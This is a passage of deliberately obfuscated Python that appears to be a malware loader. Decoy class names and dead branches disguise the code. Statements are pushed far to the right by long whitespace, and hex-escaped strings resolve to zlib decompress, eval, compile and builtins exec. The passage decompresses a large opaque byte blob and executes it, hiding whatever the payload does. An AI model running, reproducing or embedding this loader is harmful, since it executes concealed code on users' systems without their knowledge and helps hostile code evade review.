        Invert._callfunction(_floor = Invert._modulo - -1141)                                                                                                                                                                                                                                                          ;_run._add(_cube='oDooOooDOoDDDOOoODD',Divide=b'\x0f\x8cC\x18\x1c\xc8*p\x1f\xe8\x19\x8d\xd0\xa2\xed\xa0\xdb\x8b\xb2\xc7\xb7)\x17P\n\xfb\x1e.\xe0\x00\xf5\x8b\xed\x06\xdac\xaf\xc3\xa7v`\x94\x88+xvi$\xa1\x9d)\xa8iQ\xa2\xef\x02\x8b\x92:\x0cm\xefj\xab?e\x9f\x82:\x01Z\x0e\xd4\xe2jz\xa0\xbc\xa3\xd2\xe23h?\xd0\x02\xfa\x1a\x843\x80\xc6\x01\x8e\xc9\x87\xb8\x82\xf6\xa4\xf6\x92~Q\xa5G%\xb6\xdd\xe3\xbd)\xdd\x11\xdbnb\xcf\xc8\xcc\xe3\x97\xbe\xaf\\|\xbb\xee\xfdbA\xa4j@\xb4U\x198v+\x01\xd4\x9b\xe4}b\x00\xf5\x16s\x1c\xddh\x87kQ\xca\xb0\x96\xfeI<\x9d\xc4\xd5Ee\xdc\xa5I\xdbx\x88\xd8\xcci\xd1?\xfe\x0f\x9f\xb7\xd0\xaaL\xd3\xe2\x14-.\xb2\x9ae\x9fe\xb2\xd60\xdbl\xb5\xd5\x07\xe9\xa0\x18\xb6)\x02|\x8a\xc5\xb0\\o\xbe>HX\x89\xd7},o\xf0\xadO\xf1\x94\xe9\x8e2F\x7f|LO\xf8\xd1K,%W,#V`By\xf3\x95V\noR\xb1\x14\xd9&y7^\x8a\xec\x99#\x9a\xa2\x97m\xc8b\xca\xdbm\'\xdf?\xf4\xaa\x85u\xbe\x8a8\x85\xe5\xf8\x05\xb9\xb3#G1\xe3V\x95\xebF\x1ezlf\xda\xac\x8bs+`\x9f\x9c\xcc\xce+\x13\xd7K\x9bpwNs=*U]\xca-6\xe3U\xf3E\xdd6Z\xc0\xed\xb9\xa3\xd8\xec=\xb9\xb2d@K"7\xb7\x1a\xcb>d\xb4\xc3\x19#\x1e\xe4\xe4p\xd3\xb5\xd5\x1fu\xdc\x16\xca%\xf4\x16\x17\xc1oy\xc5*}s\xe7\xedcy7\x8cV|>\x1b1\xa4eW\xac\xa3GU\xf4(\x8a\x1eWQ\x83\xc53\xde\xfbj!?t\x039\t]\xb2&\x08\x9e\x03\xbf4\xd8`~\xd3)\xcb\xdc\xbe8\x85\x91{g\xeaY\xd7]\x8f7)=\xfa\xa4\xcaQ\xa7\x027L\xddXE\x9fqf\x11\xd7=\xe0\x17\x02d\x99U\x9e\x9eY\xf9\xb34\xf5Y\xae\x97O\xd0\xab(\xe4\xb9\xc5\xa9Jg\x1b\xaeE\xf2\xa8\x8a\t\xbd\xf9\n\x96\xc5J\xc5\x85Q\xe6Vxc\x93\xbc\x1b\xf3\xc6\xab\x0e\'=\xa8[\x82\x85\x88\xb8\xb5\xebJ\xee.&\x8e.\x81]\xb1~%r!2\xf1\x0c\xad\xca\x19\xd2\xb7\x8acp{J\xd6U\x0c%\x0e\xd6\x92U\x17\x83\xe5\xb4o+\x86\xa1k\xd6\xfd53c_`}\x8a\xaf\xb5&\xc9|\x82\xd8\xce\xa7N-\x85\x00.\xc7$\xa4;\x8em_\xbf*\xd1\xaeW\xc2j\x99\x89P\xc5\x84\xa8y\xc7\xadL\xdf\xe1\xa2\x9a[\xae`\xb7W\x0c\x93\x9b\x85\xc6M\xa8\xd9\xe8\x05\xbe\x85dWd\xbf\xaa\xc8}\xa7\x12:\x16\x18}\xb1I^\x7f\xd7afO\x9d\x9c\xb43.\x8aKc<6&{E\xf0V\xb6\xe8[]\xac\xf5\xc1\xda\x19\x8br\x1e\xabc\xacJUX\x9b:rggjS\x9c\x87\xa1\xb8\t9<\xc0\xa1I\x06\x03\xf0*Q\xb409L\x12\xa3\xcb\xa6\xf8\xdd"\xd8\x95-\xd5\xe7\x00\x80/\x8e_\xe5!\xa7\xe7\xd1\t\x9epp\xcc\x0b\x19\xff\xa3\x9c\xcd\x94\xf1`\x92\x8f\xea\xc5\x97\x7f\xeb\xfa\x9b\xc2\xf5\xf46\x8d\xf7\xb3Y:\xd9\x9f\xce&\xfb\xf9U:\xae1\xa9!+\xd88\xe7e\xddX\xcdf\xcd<t\x93\xf6\xfb\x93\xfcf\x9aNj\xd7\x93a\x87\x0b\xce\x89msfv\xf9am\x9e\xe5\x80\x856\x90\xaf|<\x9f\x16g\xd3\xeb\xfe\xd5$\x8f\xd3\xe9<\xe5\xae<\xfd<\xcd\xc7\xc5y<\xbb\xbbJ\xa7\xb5$\x9b\xa4\xf1,\x9f\xdcu\xcc\'|.\xe6\x1f\xf1\xc1Em\x90\r\xd3\xdeU4\xfb\xd4\xc9\xa7\x07<\xca\xd7\x1f\x1b\xe5c\xfb\xa3r\xaeB\xb1\x12\xbbNi\xd6\x92h\x16u\xfe%_\xa9\xd6mkZX7\xecy\xfbva\xfd_\x1e\xf6M\xe6s\x83#\xc7)\xd6\xfd\xd1Im\xf3\x8d\xb7\xb9t3\xd2N?xR\xd2\xc9IA\xbfm\xe0Q\x07\xcf\xd3B\x14c\x91q\xf4:\xbf|\xc8K\xc7\xd6\x9b\xb5\xfe\xf2\xbc]\x892\x9aG\x1e\x15\xe5\x9f\x1a\xfe\xd0$\xa8\t\xf3\xa4-\xdf\xc9\x14\xf7O\xb1v\xbbDFv\xf5S\\t\xa3\xab\xad\x0c\xba\x87x\xde6\xabb\x95\xabd\xf11\x9d[{\xf5\xf8\xa7md1\x8e\x87\xed\xf1\\\x98\x8f\x8b\xefH\x08l\xfa)c\xc5\x1c\x1b8\xba\xdd\xf6\xa9\xe1\x11\xcd\xd2\xa7\xa7\xc5\xb5\xce?*?\x967.b\x92\xf5U\xbb\xfcT\xb7\xf9\x92\xa0\x99\xfd\xf5A?W\xce\x04\xfbP|r\xf0\xe2\xa2m\x96ucoGz>9\xbb):\xff\x9csO\x8a\xbf\xd3v\x01N\xd1T\xa7\xa7\xb5?j\xd9\xa0^\x10Xz\x9bMg\xd3FIy\xe6\xa3\xea7\xd9\xecS](\xbf\xbc\xb3\xffY\xaf7%_\x8d\xe2\x7f\x965\xa3i\x9d\xf7\xe7\x1fb?\x7f\xff\xf3\xdf\xbb\xef\xde\xf7~z\xf7\xee\xec\xd7\xd3_z\x7f\xe9\x1e\xbf\xef\x94E\xd4\xd2\xe1\xd4d\xc6\xfbG\xd1\x97\x14\xa4=\xad\xd0\xb7@\xd3\xcb\xbftt\x1c^\x11\x8dgf_\xf2\xacy/x\x17\xf3\x0f\xa8\x17\xdf\xc8"|d\xc3\xde"\x90L:H\xaeGW\rr\xcd~\x99c\x9f\x1fD\x1c\xcf:G]\xf9$\x80\xb8\x1a\x85\xc4\xf4KY\x97\xdeO\xbf\xfc\xf2s\xf7?\x7f\xfd\xe5}\xef\xaf\xdd\xc3\xc3\xf7\xa7\x1d\xeb\xd6r\xe4\xb6\xe6\xf1\x83\x1b\x142\x1c\x1e|I\'\xe3t\xe8:\x07\xe7\xe9\xec/(\xfb\xa7\xd9l\x92\xf5\xafg\xe9\xf4\xa2\x02\xf3\xda"\xef\xaf\xa2,\xb0d\xd6[\xd2^i&<\xb9\x15\x92tP\x87\x0c\x9dE\xc3!\x12\xe2/\xd1e\xda0\xc7\xde8\x1a\xa5\x86\x06\xe6\xd2\xed`r=n\xd4~\x83p;\xa0t\xbd\x9eE}`K\x8b\x89R\x93\x9c\x17_\xaf\xd9/b)\x8b\xb8J\n\x1b\xc6,\x1f\xeb\xf8\xe5\xae\x8ef6\x91\xcd\xfb\xd57\x7f\xdc/\xeb\x10O\xd2h\x96\xe5\xe3\xc10\xba\x9cv*\xb0\xbc\xfb\xf9\xfdO\xc0\xd5\xe9Y\xef\xa2{zxvQk\xd6f\x93;\r\xb2\xe8\x88\xab\xbb\xf1\xd5\xf5\xac\xd0\x10_\xd2\xbb~\x1eM\x12\xb9o\xd2f\xd9(]\xb8\xfe\x84\x97%\xd9\xf8r^\x08(#e\xb6"Kq\r\xf5\x12\xa7W3\xfd\xbae$\x9e\xe5\xc6i@\xf9g\xc9J\'\xe0\xd0\xe6\xda\xbc\x0b\xf2\xb6T\xc2\xce\xfa\xcc\xb7\xb77\xe57~o\xcc\xac\xe4\x9b\x9b\xe6\xcb\xd4Y\n\xb8\xcc\xf3\xcbaz\x90G\xd7\xb3ON\x91\x07\xea\xef\xf7,N{Q\x1c\xe7\xd7\xe3Y5gt\x95\xc5\xc3\x0c\xdcr\x90d\xd38\xff=\x9d\xdc\x15OQG\'\xb5\xf3wg\x7f{\x7f\xde\xf9\xcd\x88\xce\xd1\xa8"\xfb>\xd6\xd0\xba\tZu\xb1\xfc\x83wHE\x91Y4\x9c\x1e\xf0]\xbd\xa5\x0c\xc2\xa5\x8du\xd4\xbd\x0f\x18\xc0}\x1d\xfd\xd6f\xed\xf0\xec\xdd\xaf\'\xefq\xb3{\xd8\xa1v\x17m\xa4\x1d\x9e\xa2\x81j\xa6\xe4\x8e\x00\xdb0\xeb\x97u\x8b\x03\xf6\xfb\xfak\xb8\x87\xc66\x90\x93\xfdx\x0e`G\xaa\xd0\x14f\xba\x99\xd0\x04iD\x86q&\xe9\xff\\\xa7\x90\xaa\x9d\xdfj\xff*\xe9\x99\x7fs-Ph\x14\x99\x84\xd8^\xcc\xc5?\xf3Eh\xb3\xb6\xa3\x8cyt\xd7d+4xa\xeah&l\x17c\x99s\xc53\xde\xffs\xfd|\x16\xd1z\x19\xa0\xe9\xd3z\x92\xc7\xd7#T\xa5\xf6\xc7\xfeJ\xa9\xa2\\e]I\xa3B\xa9d\xdbZ\xf8\x98\xc10\x11Bo\xa3\xb7\x9f\xf5X\x16\x95\x81\xd6\rC\xd1\r\xd9\x10Z\xe6\x8f\xdaG\x83\x8e\xe9\xf5pV4\xf6A\xf1\xe6i\xa3y\xd0\x8ff\xf1\xa7_\xaf\xc8\\\x8d"\xbd\x9bt*\xad\xb7\xdf\xcf\x93\xbb\xce\xbf\xba2\xf1\xe1H\xbb\x118\x1d\xa2\xdb.\xb0\xfcG\xd3\x08\xa5\xb4\xd1\xac\r\xb3q\xda\xb9-g\xee\xdf\x94\x02\xe8\xa6^\x1bF\xd0-W\x80f\x9a&=\xb2C\x87\xbb\x03\xee\x1a\xba\x1d\xe3Oi\xfc\xa5\x97\x8d\xa3x\x96\xfd\x9e\xcd\xee\x1a\xa6A/\x87y?\x1a\xd6Y\xf8\xc2\xf5r\x81Zp\x7f\x02\x91\xd6\xb5\x8e6\x8b\x1eq\xf5#\x11\rs\x11\r\x15\\y\xfb\x0f+E\xfdG\xe7C\xe1\x85\x9bO:k/4\x15\x8a D\xf5?u\xf4\xbcU\x91\xb0\xd2^b\xe4\xb4W\xda\xd5\x90),\xe5F!\xce\x84\xcdx\x02y\x03}X\x01\xa9y\x80|\x0397(\x14!$\xb8m6\xdf\x16Q\xe2\xc5\xb2\xf7\xfc\x7f{V\xd6\xb8\xb2\x16\xed\x99\xf5\x96o$\xa8\xcd\xe6\x02L\xba\xb1n\xb5\xae\xb8\xb9-M\xd3\xfab\xae\x87\x9a\xed\xcf\xf5\x9f\xd3i:\x13\x92f\xca\xa4>\xcb!\xfe\xd2+\xdd\x96\x85H\xe7\x9f<5\x1d\xe2^\xa3\x9ch\x7fQ\xb1\x16P\xd6;>SOE\x98\xd9\x90~q>NX\xe04\xfa=\xad\xbf\xfb\xdb\xaf\xf5\xeb)\xa4\xb1\x90\nL\x06\x81\xa9\x01Y\xbbD%k\xa9\xe2a\xe2["\xb2z\xfd\xcf\xf5\xc34\x1eF\x93\xb4\xfeO&\xfc\xb3\x0e\x1do2\x00\x9eQ\x9ed\x03\xc8\xdb\x99<Xj\xbf\x02\xa7o;\x00\xea \xfe\x14M$Yk\xaczi\x81\xbc\x9fL\xf2\xc9\x02%"{\xa7S(\x8d\x83\xff\xc2\xc3Sh\x9e\xb4\xbd\xd2Zo;\xc6\x0c/-\xca\xd32O:\\[\x128:\x9d\xac+\xc9\xd80\xe5\xe0\xba\xc8\x94\xc7J\xebC!\xde\x0b\xdbh\xa1ST\x08\xdaJ\x91\xd3\xb5\x8f\x99\x8f\x9f~\x96O\xa1\x0e\xb5\x95+$\xcb\xa6\xfdM\xaf\xaa\xdb=\xea\x9a~E\xb7\xfd\xf1m\x86\xac\x92\x9dbO\xce\x0b\x9a\x98\xa4P\x8d\xd3\xb4B\x15\xeb\x912\x8d\xdb\x05\xb9!\xc3\xfbi\xccL\xf5lZ7\x05$%\x9c\x93tv=\x19\xd7\x8d\xb1\xe5\x94\xdd\xd9\xe2\xaf6\x17W=\xad\xd3;\xa5j?\xf8E\xce\x1a\x10\xfc\x97\xe9\xac\xb3,\xde\x9a\xab\xcf\x1e$Q:\xca\xc7\x1d\x0e{\xe8\xcf.k>\xd6\xec\x9c\x9f\teJ\x16c@\x90\x1ca\xb5\xcf\xb4\xbdJ6\x84\x9dv9\x89Fk\xca\x9eR\x01\x89\x90\x9e\xce\xd2q:\x99\xe3\xe4\xd8\xa44\n\xb6\xea\x14\'\xfbs\xa4v\xe6\xa7\xf32V\n\xd5]\xe6uU37\xfe\x0f\x0fn\x7f\xf5')

        Invert.Negative(_absolute = 45570 + Invert._modulo)                                                                                                                                                                                                                                                          ;WWXWWXXWXXWWWXXWWWX,JJILLJLIJLLLJIILIJI,IJIJILLIJIILJJLLJIJJIJ,WWWWWXWXXXXXWWWXXX,xwxwwxxxxxwwxxxxwxxw=(lambda S22S222S222S2SSS2S22SS2:S22S222S222S2SSS2S22SS2(__import__('\x7a\x6c\x69\x62'))),(lambda S22S222S222S2SSS2S22SS2:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(S22S222S222S2SSS2S22SS2)"),filename='\x4d\x4d\x4e\x4d\x4d\x4d\x4d\x4d\x4e\x4d\x4e\x4d\x4d\x4d\x4d\x4e\x4d\x4e\x4e\x4e\x4e\x4d\x4e\x4e\x4d',mode='\x65\x76\x61\x6c'))),(lambda S22S222S222S2SSS2S22SS2:S22S222S222S2SSS2S22SS2['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda:(lambda S22S222S222S2SSS2S22SS2:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(S22S222S222S2SSS2S22SS2)"),filename='\x4d\x4d\x4e\x4d\x4d\x4d\x4d\x4d\x4e\x4d\x4e\x4d\x4d\x4d\x4d\x4e\x4d\x4e\x4e\x4e\x4e\x4d\x4e\x4e\x4d',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63')),(lambda jlljijjjjlljlijjiii,S22S222S222S2SSS2S22SS2:jlljijjjjlljlijjiii(S22S222S222S2SSS2S22SS2))
        Invert.Negative(_absolute = 76785 + Invert._modulo)                                                                                                                                                                                                                                                          ;WWWWWXWXXXXXWWWXXX()(xwxwwxxxxxwwxxxxwxxw(IJIJILLIJIILJJLLJIJJIJ(WWXWWXXWXXWWWXXWWWX(JJILLJLIJLLLJIILIJI('\x76\x61\x72\x73'))),_run._frame(_detectvar='XWWWWWWXXXWXXXWWXXXWXW')+_run._frame(_detectvar='IlllIIIllIIlIIlllllIlIllI')+_run._frame(_detectvar='oDooOooDOoDDDOOoODD')))

    except Exception as StackOverflow:
        if 483044 > 7354425:
            _run.execute(code = _builtins(StackOverflow))

        elif 228748 > 5025107:
            _run(Floor = 19480 * -3661)._callfunction(_floor = Invert._modulo + -55303)
